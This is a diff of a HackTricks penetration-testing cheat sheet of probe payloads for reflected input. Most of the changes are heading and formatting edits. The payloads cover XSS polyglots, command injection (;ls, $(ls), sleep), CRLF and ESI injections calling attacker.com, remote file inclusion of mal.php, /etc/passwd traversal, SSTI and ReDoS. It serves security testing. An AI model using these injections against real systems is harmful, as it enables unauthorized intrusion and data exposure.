|
|
|
@ -1,33 +1,28 @@
|
|
|
|
|
|
|
|
|
|
# Reflecting Techniques - PoCs and Polygloths CheatSheet
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
|
|
|
|
|
|
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
|
|
|
|
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
|
|
|
|
|
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
|
|
|
|
|
|
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
|
|
|
|
|
|
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
|
|
|
|
|
|
|
|
|
|
{% hint style="warning" %}
|
|
|
|
|
This **cheatsheet doesn't propose a comprehensive list of tests for each vulnerability**, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.
|
|
|
|
|
This **cheatsheet doesn't propose a comprehensive list of tests for each vulnerability**, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.
|
|
|
|
|
{% endhint %}
|
|
|
|
|
|
|
|
|
|
{% hint style="danger" %}
|
|
|
|
|
You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
|
|
|
|
|
{% endhint %}
|
|
|
|
|
|
|
|
|
|
# Polygloths list
|
|
|
|
|
## Polygloths list
|
|
|
|
|
|
|
|
|
|
```python
|
|
|
|
|
{{7*7}}[7*7]
|
|
|
|
@ -69,24 +64,24 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
|
|
|
|
|
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [Client Side Template Injection](../client-side-template-injection-csti.md)
|
|
|
|
|
## [Client Side Template Injection](../client-side-template-injection-csti.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
{{7*7}}
|
|
|
|
|
[7*7]
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
{{7*7}}[7*7]
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [Command Injection](../command-injection.md)
|
|
|
|
|
## [Command Injection](../command-injection.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
;ls
|
|
|
|
@ -99,16 +94,16 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
|
|
|
|
|
$(ls)
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
|
|
|
|
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [CRLF](../crlf-0d-0a.md)
|
|
|
|
|
## [CRLF](../crlf-0d-0a.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
%0d%0aLocation:%20http://attacker.com
|
|
|
|
@ -117,17 +112,17 @@ $(ls)
|
|
|
|
|
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# Dangling Markup
|
|
|
|
|
## Dangling Markup
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [File Inclusion/Path Traversal](../file-inclusion/)
|
|
|
|
|
## [File Inclusion/Path Traversal](../file-inclusion/)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
/etc/passwd
|
|
|
|
@ -142,9 +137,9 @@ http://asdasdasdasd.burpcollab.com/mal.php
|
|
|
|
|
\\asdasdasdasd.burpcollab.com/mal.php
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
|
|
|
|
|
## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
www.whitelisted.com
|
|
|
|
@ -154,9 +149,9 @@ https://google.com
|
|
|
|
|
javascript:alert(1)
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [ReDoS](../regular-expression-denial-of-service-redos.md)
|
|
|
|
|
## [ReDoS](../regular-expression-denial-of-service-redos.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
(\\w*)+$
|
|
|
|
@ -164,9 +159,9 @@ javascript:alert(1)
|
|
|
|
|
((a+)+)+$
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md)
|
|
|
|
|
## [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
<!--#echo var="DATE_LOCAL" -->
|
|
|
|
@ -175,19 +170,19 @@ javascript:alert(1)
|
|
|
|
|
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
|
|
|
|
|
## [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
|
|
|
|
|
|
|
|
|
|
The same tests used for Open Redirect can be used here.
|
|
|
|
|
|
|
|
|
|
# [Server Side Template Injection](../ssti-server-side-template-injection/)
|
|
|
|
|
## [Server Side Template Injection](../ssti-server-side-template-injection/)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
${{<%[%'"}}%\
|
|
|
|
@ -198,30 +193,30 @@ ${{7*7}}
|
|
|
|
|
#{7*7}
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```python
|
|
|
|
|
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
|
|
|
|
|
## [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
<xsl:value-of select="system-property('xsl:version')" />
|
|
|
|
|
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# XSS
|
|
|
|
|
## XSS
|
|
|
|
|
|
|
|
|
|
## Basic Tests
|
|
|
|
|
### Basic Tests
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
" onclick=alert() a="
|
|
|
|
@ -229,7 +224,7 @@ ${{7*7}}
|
|
|
|
|
javascript:alert()
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Polygloths
|
|
|
|
|
### Polygloths
|
|
|
|
|
|
|
|
|
|
```markup
|
|
|
|
|
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
|
|
|
@ -259,21 +254,14 @@ javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onm
|
|
|
|
|
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
|
|
|
|
|
|
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
|
|
|
|
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
|
|
|
|
|
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
|
|
|
|
|
|
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
|
|
|
|
|
|
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|